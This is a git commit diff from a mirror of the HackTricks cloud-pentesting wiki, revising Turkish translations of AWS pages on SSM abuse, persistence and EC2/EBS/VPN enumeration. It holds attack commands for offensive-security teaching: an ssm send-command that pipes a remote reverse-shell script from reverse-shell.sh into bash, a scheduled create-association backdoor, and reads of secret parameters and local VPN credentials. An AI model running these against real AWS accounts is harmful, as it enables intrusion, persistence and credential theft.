mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-07-29 07:00:29 -07:00
Translated ['src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-p
This commit is contained in:
+1
-1
@@ -230,7 +230,7 @@
|
||||
- [AWS - SNS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md)
|
||||
- [AWS - Secrets Manager Persistence](pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md)
|
||||
- [AWS - SQS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md)
|
||||
- [AWS - SSM Perssitence](pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md)
|
||||
- [AWS - SSM Perssitence](pentesting-cloud/aws-security/aws-persistence/aws-ssm-persistence.md)
|
||||
- [AWS - Step Functions Persistence](pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md)
|
||||
- [AWS - STS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md)
|
||||
- [AWS - Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/README.md)
|
||||
|
||||
+3
-3
@@ -1,4 +1,4 @@
|
||||
# AWS - SSM Perssitence
|
||||
# AWS - SSM Sürekliliği
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -10,9 +10,9 @@ Daha fazla bilgi için kontrol edin:
|
||||
../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md
|
||||
{{#endref}}
|
||||
|
||||
### Kalıcılık için ssm:CreateAssociation kullanma
|
||||
### Süreklilik için ssm:CreateAssociation kullanma
|
||||
|
||||
ssm:CreateAssociation iznine sahip bir saldırgan, SSM tarafından yönetilen EC2 örneklerinde komutları otomatik olarak yürütmek için bir State Manager Association oluşturabilir. Bu ilişkiler, etkileşimli oturumlar olmadan arka kapı benzeri kalıcılık için uygun olacak şekilde sabit bir aralıkta çalışacak şekilde yapılandırılabilir.
|
||||
**`ssm:CreateAssociation`** iznine sahip bir saldırgan, SSM tarafından yönetilen EC2 örneklerinde komutları otomatik olarak yürütmek için bir State Manager Association oluşturabilir. Bu ilişkiler, etkileşimli oturumlar olmadan arka kapı benzeri süreklilik sağlamak için sabit bir aralıkta çalışacak şekilde yapılandırılabilir.
|
||||
```bash
|
||||
aws ssm create-association \
|
||||
--name SSM-Document-Name \
|
||||
@@ -12,7 +12,7 @@ SSM hakkında daha fazla bilgi için kontrol edin:
|
||||
|
||||
### `ssm:SendCommand`
|
||||
|
||||
**`ssm:SendCommand`** iznine sahip bir saldırgan, Amazon SSM Agent'ı çalıştıran örneklerde **komutları çalıştırabilir** ve içindeki **IAM Rolünü tehlikeye atabilir.**
|
||||
**`ssm:SendCommand`** iznine sahip bir saldırgan, Amazon SSM Agent'ı çalıştıran örneklerde **komutlar çalıştırabilir** ve içindeki **IAM Rolünü tehlikeye atabilir.**
|
||||
```bash
|
||||
# Check for configured instances
|
||||
aws ssm describe-instance-information
|
||||
@@ -31,11 +31,11 @@ aws ssm send-command --instance-ids "$INSTANCE_ID" \
|
||||
--document-name "AWS-RunShellScript" --output text \
|
||||
--parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash"
|
||||
```
|
||||
**Olası Etki:** SSM Agent'ları çalışan örneklere bağlı EC2 IAM rollerine doğrudan yetki yükseltme.
|
||||
**Olası Etki:** Çalışan örneklere bağlı EC2 IAM rollerine doğrudan yetki yükseltme.
|
||||
|
||||
### `ssm:StartSession`
|
||||
|
||||
**`ssm:StartSession`** iznine sahip bir saldırgan, **Amazon SSM Agent'ı çalışan örneklerde SSH benzeri bir oturum başlatabilir** ve **içinde çalışan IAM Rolünü tehlikeye atabilir.**
|
||||
**`ssm:StartSession`** iznine sahip bir saldırgan, **Amazon SSM Agent'ı çalıştıran örneklerde SSH benzeri bir oturum başlatabilir** ve **içinde çalışan IAM Rolünü tehlikeye atabilir.**
|
||||
```bash
|
||||
# Check for configured instances
|
||||
aws ssm describe-instance-information
|
||||
@@ -51,9 +51,9 @@ aws ssm start-session --target "$INSTANCE_ID"
|
||||
|
||||
#### ECS'ye Privesc
|
||||
|
||||
**ECS görevleri** **`ExecuteCommand` etkinleştirildiğinde** yeterli izinlere sahip kullanıcılar `ecs execute-command` kullanarak **bir komut çalıştırabilirler** konteyner içinde.\
|
||||
**ECS görevleri** **`ExecuteCommand` etkinleştirildiğinde** yeterli izinlere sahip kullanıcılar `ecs execute-command` kullanarak **konteyner içinde bir komut çalıştırabilirler.**\
|
||||
[**belgelere göre**](https://aws.amazon.com/blogs/containers/new-using-amazon-ecs-exec-access-your-containers-fargate-ec2/) bu, “_exec_” komutunu başlatmak için kullandığınız cihaz ile SSM Session Manager ile hedef konteyner arasında güvenli bir kanal oluşturarak yapılır. (Bunun çalışması için SSM Session Manager Plugin gereklidir)\
|
||||
Bu nedenle, `ssm:StartSession` olan kullanıcılar, bu seçenek etkinleştirildiğinde **ECS görevleri içinde bir shell alabileceklerdir** sadece şunu çalıştırarak:
|
||||
Bu nedenle, `ssm:StartSession` iznine sahip kullanıcılar, bu seçenek etkinleştirildiğinde **ECS görevleri içinde bir shell alabileceklerdir** sadece şunu çalıştırarak:
|
||||
```bash
|
||||
aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID"
|
||||
```
|
||||
@@ -72,11 +72,11 @@ aws ssm describe-sessions
|
||||
aws ssm resume-session \
|
||||
--session-id Mary-Major-07a16060613c408b5
|
||||
```
|
||||
**Olası Etki:** Çalışan örneklere bağlı EC2 IAM rollerine doğrudan privesc ve SSM Agent'ları ile kesilmiş oturumlar.
|
||||
**Potansiyel Etki:** Çalışan örneklere bağlı EC2 IAM rollerine doğrudan privesc ve SSM Agent'ları ile bağlantısı kesilmiş oturumlar.
|
||||
|
||||
### `ssm:DescribeParameters`, (`ssm:GetParameter` | `ssm:GetParameters`)
|
||||
|
||||
Belirtilen izinlere sahip bir saldırgan, **SSM parametrelerini** listeleyebilecek ve **açık metin olarak okuyabilecektir**. Bu parametrelerde sıklıkla **hassas bilgiler** bulabilirsiniz, örneğin SSH anahtarları veya API anahtarları.
|
||||
Belirtilen izinlere sahip bir saldırgan, **SSM parametrelerini** listeleyebilecek ve **bunları düz metin olarak okuyabilecektir**. Bu parametrelerde sıklıkla **hassas bilgiler** bulabilirsiniz, örneğin SSH anahtarları veya API anahtarları.
|
||||
```bash
|
||||
aws ssm describe-parameters
|
||||
# Suppose that you found a parameter called "id_rsa"
|
||||
@@ -95,7 +95,7 @@ aws ssm list-commands
|
||||
|
||||
### `ssm:GetCommandInvocation`, (`ssm:ListCommandInvocations` | `ssm:ListCommands`)
|
||||
|
||||
Bu izinlere sahip bir saldırgan, gönderilen tüm **komutları** listeleyebilir ve **çıktıyı** okuyarak umarım üzerinde **hassas bilgiler** bulabilir.
|
||||
Bu izinlere sahip bir saldırgan, gönderilen tüm **komutları** listeleyebilir ve **üretilecek çıktıyı** okuyarak umarım **hassas bilgileri** bulabilir.
|
||||
```bash
|
||||
# You can use any of both options to get the command-id and instance id
|
||||
aws ssm list-commands
|
||||
@@ -103,7 +103,21 @@ aws ssm list-command-invocations
|
||||
|
||||
aws ssm get-command-invocation --command-id <cmd_id> --instance-id <i_id>
|
||||
```
|
||||
**Olası Etki:** Komut satırlarının çıktısında hassas bilgileri bulmak.
|
||||
**Potansiyel Etki:** Komut satırlarının çıktısında hassas bilgileri bulmak.
|
||||
|
||||
### ssm:CreateAssociation Kullanımı
|
||||
|
||||
**`ssm:CreateAssociation`** iznine sahip bir saldırgan, SSM tarafından yönetilen EC2 örneklerinde komutları otomatik olarak çalıştırmak için bir State Manager Association oluşturabilir. Bu ilişkiler, etkileşimli oturumlar olmadan arka kapı benzeri kalıcılık için uygun hale getirmek üzere sabit bir aralıkta çalışacak şekilde yapılandırılabilir.
|
||||
```bash
|
||||
aws ssm create-association \
|
||||
--name SSM-Document-Name \
|
||||
--targets Key=InstanceIds,Values=target-instance-id \
|
||||
--parameters commands=["malicious-command"] \
|
||||
--schedule-expression "rate(30 minutes)" \
|
||||
--association-name association-name
|
||||
```
|
||||
> [!NOTE]
|
||||
> Bu kalıcılık yöntemi, EC2 örneği Systems Manager tarafından yönetildiği, SSM ajanı çalıştığı ve saldırganın ilişkilendirmeler oluşturma iznine sahip olduğu sürece çalışır. Etkileşimli oturumlar veya açık ssm:SendCommand izinleri gerektirmez. **Önemli:** `--schedule-expression` parametresi (örneğin, `rate(30 minutes)`) AWS'nin minimum 30 dakikalık aralığını dikkate almalıdır. Anlık veya tek seferlik yürütme için `--schedule-expression` tamamen hariç tutulmalıdır — ilişkilendirme oluşturulduktan sonra bir kez yürütülecektir.
|
||||
|
||||
### Codebuild
|
||||
|
||||
|
||||
+27
-19
@@ -12,7 +12,7 @@ aws-vpc-and-networking-basic-information.md
|
||||
|
||||
## EC2
|
||||
|
||||
Amazon EC2, **sanallaştırılmış sunucular** başlatmak için kullanılır. **Güvenlik** ve **ağ** yapılandırmasına izin verir ve **depolama** yönetimini sağlar. Amazon EC2'nin esnekliği, kaynakları yukarı ve aşağı ölçeklendirme yeteneğinde belirgindir; bu, değişen gereksinim değişikliklerine veya popülaritedeki artışlara etkili bir şekilde uyum sağlamasını sağlar. Bu özellik, kesin trafik tahminleri yapma gereksinimini azaltır.
|
||||
Amazon EC2, **sanallaştırılmış sunucular** başlatmak için kullanılır. **Güvenlik** ve **ağ** yapılandırmasına ve **depolama** yönetimine olanak tanır. Amazon EC2'nin esnekliği, kaynakları yukarı ve aşağı ölçeklendirme yeteneğinde belirgindir; bu, değişen gereksinimlere veya popülaritedeki artışlara etkili bir şekilde uyum sağlamasını sağlar. Bu özellik, kesin trafik tahminleri yapma gereğini azaltır.
|
||||
|
||||
EC2'de sayılacak ilginç şeyler:
|
||||
|
||||
@@ -29,13 +29,13 @@ EC2'de sayılacak ilginç şeyler:
|
||||
|
||||
### Instance Profiles
|
||||
|
||||
**EC2 örnekleri** üzerinde çalışan uygulamalara izin vermek için **roller** kullanmak biraz ekstra yapılandırma gerektirir. Bir EC2 örneğinde çalışan bir uygulama, sanallaştırılmış işletim sistemi tarafından AWS'den soyutlanmıştır. Bu ekstra ayrım nedeniyle, bir AWS rolünü ve ona bağlı izinleri bir EC2 örneğine atamak ve bunları uygulamalarına sunmak için ek bir adım gereklidir.
|
||||
**EC2 örneklerinde** çalışan uygulamalara izin vermek için **roller** kullanmak biraz ekstra yapılandırma gerektirir. Bir EC2 örneğinde çalışan bir uygulama, sanallaştırılmış işletim sistemi tarafından AWS'den soyutlanmıştır. Bu ekstra ayrım nedeniyle, bir AWS rolünü ve ona bağlı izinleri bir EC2 örneğine atamak ve bunları uygulamalarına sunmak için ek bir adım gereklidir.
|
||||
|
||||
Bu ek adım, örneğe bağlı bir [_**instance profile**_](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html) **oluşturulmasıdır**. **Instance profile, rolü içerir ve** örnekte çalışan bir uygulamaya rolün geçici kimlik bilgilerini sağlayabilir. Bu geçici kimlik bilgileri, uygulamanın API çağrılarında kaynaklara erişmek ve yalnızca rolün belirttiği kaynaklara erişimi sınırlamak için kullanılabilir. **Bir EC2 örneğine yalnızca bir rol atanabileceğini** ve örnekteki tüm uygulamaların aynı rolü ve izinleri paylaştığını unutmayın.
|
||||
Bu ek adım, örneğe bağlı bir [_**instance profile**_](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html) oluşturulmasıdır. **Instance profile, rolü içerir ve** örnekte çalışan bir uygulamaya rolün geçici kimlik bilgilerini sağlayabilir. Bu geçici kimlik bilgileri, uygulamanın API çağrılarında kaynaklara erişmek ve yalnızca rolün belirttiği kaynaklara erişimi sınırlamak için kullanılabilir. **Bir EC2 örneğine yalnızca bir rol atanabileceğini** ve örnekteki tüm uygulamaların aynı rolü ve izinleri paylaştığını unutmayın.
|
||||
|
||||
### Metadata Endpoint
|
||||
|
||||
AWS EC2 metadata, bir Amazon Elastic Compute Cloud (EC2) örneği hakkında, örneğin çalışma zamanında mevcut olan bilgilerdir. Bu metadata, örneğin örnek kimliği, çalıştığı kullanılabilirlik bölgesi, örneğe bağlı IAM rolü ve örneğin ana bilgisayar adı gibi bilgileri sağlamak için kullanılır.
|
||||
AWS EC2 metadata, bir Amazon Elastic Compute Cloud (EC2) örneği hakkında, örneğin çalışma zamanında mevcut olan bilgilerdir. Bu metadata, örneğin kimlik numarası, çalıştığı kullanılabilirlik bölgesi, örneğe bağlı IAM rolü ve örneğin ana bilgisayar adı gibi bilgileri sağlamak için kullanılır.
|
||||
|
||||
{{#ref}}
|
||||
https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html
|
||||
@@ -135,7 +135,7 @@ aws ec2 describe-vpc-peering-connections
|
||||
|
||||
### Yetki Yükseltme
|
||||
|
||||
Aşağıdaki sayfada **EC2 izinlerini kötüye kullanarak yetki yükseltmeyi** kontrol edebilirsiniz:
|
||||
Aşağıdaki sayfada **EC2 izinlerini kötüye kullanarak yetki yükseltme** yöntemlerini kontrol edebilirsiniz:
|
||||
|
||||
{{#ref}}
|
||||
../../aws-privilege-escalation/aws-ec2-privesc.md
|
||||
@@ -149,17 +149,17 @@ Aşağıdaki sayfada **EC2 izinlerini kötüye kullanarak yetki yükseltmeyi** k
|
||||
|
||||
## EBS
|
||||
|
||||
Amazon **EBS** (Elastic Block Store) **anlık görüntüleri**, temelde AWS EBS hacimlerinin statik **yedekleridir**. Diğer bir deyişle, belirli bir zamanda bir **EC2** Instance'a bağlı olan **disklerin** **kopyalarıdır**. EBS anlık görüntüleri bölgeler ve hesaplar arasında kopyalanabilir veya hatta indirilebilir ve yerel olarak çalıştırılabilir.
|
||||
Amazon **EBS** (Elastic Block Store) **anlık görüntüleri**, temelde AWS EBS hacimlerinin statik **yedekleridir**. Diğer bir deyişle, belirli bir zamanda bir **EC2** Örneğine bağlı **disklerin** **kopyalarıdır**. EBS anlık görüntüleri bölgeler ve hesaplar arasında kopyalanabilir veya hatta indirilebilir ve yerel olarak çalıştırılabilir.
|
||||
|
||||
Anlık görüntüler, **kaynak kodu veya API anahtarları** gibi **hassas bilgiler** içerebilir, bu nedenle, şansınız varsa, kontrol etmeniz önerilir.
|
||||
|
||||
### AMI & EBS Farkı
|
||||
|
||||
Bir **AMI**, **EC2 örneği başlatmak için** kullanılırken, bir EC2 **Anlık Görüntüsü**, **EBS hacminde depolanan verileri yedeklemek ve kurtarmak için** kullanılır. Bir EC2 Anlık Görüntüsü yeni bir AMI oluşturmak için kullanılabilir, ancak bu bir AMI ile aynı şey değildir ve bir uygulamayı çalıştırmak için gereken işletim sistemi, uygulama sunucusu veya diğer yazılımlar hakkında bilgi içermez.
|
||||
Bir **AMI**, **bir EC2 örneği başlatmak** için kullanılırken, bir EC2 **Anlık Görüntüsü**, **bir EBS hacminde depolanan verileri yedeklemek ve kurtarmak** için kullanılır. Bir EC2 Anlık Görüntüsü yeni bir AMI oluşturmak için kullanılabilir, ancak bu bir AMI ile aynı şey değildir ve bir uygulamayı çalıştırmak için gereken işletim sistemi, uygulama sunucusu veya diğer yazılımlar hakkında bilgi içermez.
|
||||
|
||||
### Yetki Yükseltme
|
||||
|
||||
Aşağıdaki sayfada **EBS izinlerini kötüye kullanarak yetki yükseltmeyi** kontrol edebilirsiniz:
|
||||
Aşağıdaki sayfada **EBS izinlerini kötüye kullanarak yetki yükseltme** yöntemlerini kontrol edebilirsiniz:
|
||||
|
||||
{{#ref}}
|
||||
../../aws-privilege-escalation/aws-ebs-privesc.md
|
||||
@@ -167,11 +167,11 @@ Aşağıdaki sayfada **EBS izinlerini kötüye kullanarak yetki yükseltmeyi** k
|
||||
|
||||
## SSM
|
||||
|
||||
**Amazon Simple Systems Manager (SSM)**, EC2 örneklerinin yönetimini uzaktan yaparak yönetimlerini çok daha kolay hale getirir. Bu örneklerin her biri, **SSM Agent hizmetini çalıştırıyor olmalıdır, çünkü bu hizmet AWS API'sinden gelen eylemleri alıp gerçekleştirecektir**.
|
||||
**Amazon Simple Systems Manager (SSM)**, EC2 örneklerinin gruplarını uzaktan yönetmeyi sağlar ve yönetimlerini çok daha kolay hale getirir. Bu örneklerin her biri, **SSM Agent hizmetini çalıştırıyor olmalıdır, çünkü bu hizmet AWS API'sinden gelen eylemleri alıp gerçekleştirecektir**.
|
||||
|
||||
**SSM Agent**, Sistem Yöneticisi'nin bu kaynakları güncellemesini, yönetmesini ve yapılandırmasını mümkün kılar. Ajan, **AWS Cloud'daki Sistem Yöneticisi hizmetinden gelen istekleri işler** ve ardından isteklerde belirtildiği gibi çalıştırır.
|
||||
**SSM Agent**, Sistem Yöneticisi'nin bu kaynakları güncellemesini, yönetmesini ve yapılandırmasını mümkün kılar. Ajan, **AWS Bulutundaki Sistem Yöneticisi hizmetinden gelen istekleri işler** ve ardından isteklerde belirtildiği gibi çalıştırır.
|
||||
|
||||
**SSM Agent**, [**bazı AMI'lerde önceden yüklenmiş olarak gelir**](https://docs.aws.amazon.com/systems-manager/latest/userguide/ami-preinstalled-agent.html) veya örneklerde [**manuel olarak yüklemeniz gerekir**](https://docs.aws.amazon.com/systems-manager/latest/userguide/sysman-manual-agent-install.html). Ayrıca, örnek içinde kullanılan IAM Rolü'nün, iletişim kurabilmesi için **AmazonEC2RoleforSSM** politikasına sahip olması gerekir.
|
||||
**SSM Agent**, [**bazı AMI'lerde önceden yüklenmiş olarak gelir**](https://docs.aws.amazon.com/systems-manager/latest/userguide/ami-preinstalled-agent.html) veya örneklerde [**manuel olarak yüklemeniz gerekir**](https://docs.aws.amazon.com/systems-manager/latest/userguide/sysman-manual-agent-install.html). Ayrıca, örnek içinde kullanılan IAM Rolü, iletişim kurabilmesi için **AmazonEC2RoleforSSM** politikasına sahip olmalıdır.
|
||||
|
||||
### Sayım
|
||||
```bash
|
||||
@@ -194,6 +194,14 @@ Aşağıdaki sayfada **SSM izinlerini kötüye kullanarak ayrıcalıkları artı
|
||||
../../aws-privilege-escalation/aws-ssm-privesc.md
|
||||
{{#endref}}
|
||||
|
||||
### Perssistence
|
||||
|
||||
Aşağıdaki sayfada **SSM izinlerini kötüye kullanarak kalıcılık sağlama** yöntemini kontrol edebilirsiniz:
|
||||
|
||||
{{#ref}}
|
||||
../../aws-persistence/aws-ssm-persistence.md
|
||||
{{#endref}}
|
||||
|
||||
## ELB
|
||||
|
||||
**Elastic Load Balancing** (ELB), **Amazon Web Services** (AWS) dağıtımları için bir **yük dengeleme hizmetidir**. ELB, gelen uygulama trafiğini otomatik olarak **dağıtır** ve trafik taleplerini karşılamak için kaynakları ölçeklendirir.
|
||||
@@ -230,7 +238,7 @@ aws autoscaling describe-load-balancers
|
||||
|
||||
AWS Nitro, AWS EC2 örneklerinin temel platformunu oluşturan **yenilikçi teknolojiler** paketidir. Amazon tarafından **güvenliği, performansı ve güvenilirliği artırmak** amacıyla tanıtılan Nitro, özel **donanım bileşenleri ve hafif bir hipervizör** kullanır. Geleneksel sanallaştırma işlevlerinin çoğunu özel donanım ve yazılıma soyutlayarak, **saldırı yüzeyini minimize eder** ve kaynak verimliliğini artırır. Sanallaştırma işlevlerini devrederek, Nitro'nun EC2 örneklerinin **neredeyse bare-metal performansı** sunmasına olanak tanır, bu da kaynak yoğun uygulamalar için özellikle faydalıdır. Ayrıca, Nitro Güvenlik Çipi, **donanım ve yazılım güvenliğini** özel olarak sağlar ve sağlam mimarisini daha da güçlendirir.
|
||||
|
||||
Daha fazla bilgi ve nasıl sayılacağını öğrenmek için:
|
||||
Daha fazla bilgi ve nasıl sayılacağı hakkında bilgi almak için:
|
||||
|
||||
{{#ref}}
|
||||
aws-nitro-enum.md
|
||||
@@ -238,7 +246,7 @@ aws-nitro-enum.md
|
||||
|
||||
## VPN
|
||||
|
||||
Bir VPN, **on-premise ağınızı (site-to-site VPN)** veya **çalışanların dizüstü bilgisayarlarını (Client VPN)** bir **AWS VPC** ile bağlayarak hizmetlerin internete maruz kalmadan erişilmesini sağlar.
|
||||
Bir VPN, **on-premise ağınızı (site-to-site VPN)** veya **çalışanların dizüstü bilgisayarlarını (Client VPN)** **AWS VPC** ile bağlayarak hizmetlerin internete maruz kalmadan erişilmesini sağlar.
|
||||
|
||||
#### Temel AWS VPN Bileşenleri
|
||||
|
||||
@@ -246,22 +254,22 @@ Bir VPN, **on-premise ağınızı (site-to-site VPN)** veya **çalışanların d
|
||||
- Müşteri Geçidi, bir VPN bağlantısının sizin tarafınızı temsil etmek için AWS'de oluşturduğunuz bir kaynaktır.
|
||||
- Temelde, Site-to-Site VPN bağlantınızın sizin tarafınızdaki fiziksel bir cihaz veya yazılım uygulamasıdır.
|
||||
- AWS'ye bir Müşteri Geçidi oluşturmak için yönlendirme bilgilerini ve ağ cihazınızın (örneğin bir yönlendirici veya bir güvenlik duvarı) genel IP adresini sağlarsınız.
|
||||
- VPN bağlantısını kurmak için bir referans noktası olarak hizmet eder ve ek ücret talep etmez.
|
||||
- VPN bağlantısını kurmak için bir referans noktası olarak hizmet eder ve ek ücretler getirmez.
|
||||
2. **Sanal Özel Geçit**:
|
||||
- Sanal Özel Geçit (VPG), Site-to-Site VPN bağlantısının Amazon tarafındaki VPN konsantratörüdür.
|
||||
- VPC'nize bağlıdır ve VPN bağlantınız için hedef olarak hizmet eder.
|
||||
- VPG, VPN bağlantısının AWS tarafı uç noktasıdır.
|
||||
- VPC'niz ile on-premises ağınız arasındaki güvenli iletişimi yönetir.
|
||||
3. **Site-to-Site VPN Bağlantısı**:
|
||||
- Site-to-Site VPN bağlantısı, on-premises ağınızı güvenli bir IPsec VPN tüneli aracılığıyla bir VPC'ye bağlar.
|
||||
- Site-to-Site VPN bağlantısı, on-premises ağınızı güvenli, IPsec VPN tüneli aracılığıyla bir VPC'ye bağlar.
|
||||
- Bu tür bir bağlantı, bir Müşteri Geçidi ve bir Sanal Özel Geçit gerektirir.
|
||||
- Veri merkeziniz veya ağınız ile AWS ortamınız arasında güvenli, kararlı ve tutarlı iletişim için kullanılır.
|
||||
- Genellikle düzenli, uzun vadeli bağlantılar için kullanılır ve bağlantı üzerinden aktarılan veri miktarına göre faturalandırılır.
|
||||
4. **Client VPN Uç Noktası**:
|
||||
- Client VPN uç noktası, AWS'de oluşturduğunuz bir kaynaktır ve istemci VPN oturumlarını etkinleştirmek ve yönetmek için kullanılır.
|
||||
- Bireysel cihazların (dizüstü bilgisayarlar, akıllı telefonlar vb.) AWS kaynaklarına veya on-premises ağınıza güvenli bir şekilde bağlanmasına olanak tanır.
|
||||
- Client VPN uç noktası, AWS'de oluşturduğunuz ve client VPN oturumlarını etkinleştiren ve yöneten bir kaynaktır.
|
||||
- Bireysel cihazların (dizüstü bilgisayarlar, akıllı telefonlar vb.) AWS kaynaklarına veya on-premises ağınıza güvenli bir şekilde bağlanmasını sağlamak için kullanılır.
|
||||
- Site-to-Site VPN'den farklı olarak, tüm ağları bağlamak yerine bireysel istemciler için tasarlanmıştır.
|
||||
- Client VPN ile her istemci cihazı, güvenli bir bağlantı kurmak için bir VPN istemci yazılımı kullanır.
|
||||
- Client VPN ile her client cihazı, güvenli bir bağlantı kurmak için bir VPN istemci yazılımı kullanır.
|
||||
|
||||
[**AWS VPN'lerin faydaları ve bileşenleri hakkında daha fazla bilgi bulabilirsiniz**](aws-vpc-and-networking-basic-information.md#vpn).
|
||||
|
||||
@@ -293,7 +301,7 @@ aws ec2 describe-vpn-connections
|
||||
|
||||
**Yerel Geçici Kimlik Bilgileri**
|
||||
|
||||
AWS VPN Client bir VPN'e bağlanmak için kullanıldığında, kullanıcı genellikle **AWS'ye giriş yapar** ve VPN'e erişim elde eder. Ardından, VPN bağlantısını kurmak için bazı **AWS kimlik bilgileri oluşturulur ve yerel olarak saklanır**. Bu kimlik bilgileri **şu konumda saklanır**: `$HOME/.config/AWSVPNClient/TemporaryCredentials/<region>/temporary-credentials.txt` ve bir **AccessKey**, bir **SecretKey** ve bir **Token** içerir.
|
||||
AWS VPN Client bir VPN'e bağlanmak için kullanıldığında, kullanıcı genellikle **AWS'e giriş yapar** ve VPN'e erişim elde eder. Ardından, VPN bağlantısını kurmak için bazı **AWS kimlik bilgileri oluşturulur ve yerel olarak saklanır**. Bu kimlik bilgileri **şu konumda saklanır**: `$HOME/.config/AWSVPNClient/TemporaryCredentials/<region>/temporary-credentials.txt` ve bir **AccessKey**, bir **SecretKey** ve bir **Token** içerir.
|
||||
|
||||
Kimlik bilgileri `arn:aws:sts::<acc-id>:assumed-role/aws-vpn-client-metrics-analytics-access-role/CognitoIdentityCredentials` kullanıcısına aittir (TODO: bu kimlik bilgilerinin izinleri hakkında daha fazla araştırma yap).
|
||||
|
||||
|
||||
Reference in New Issue
Block a user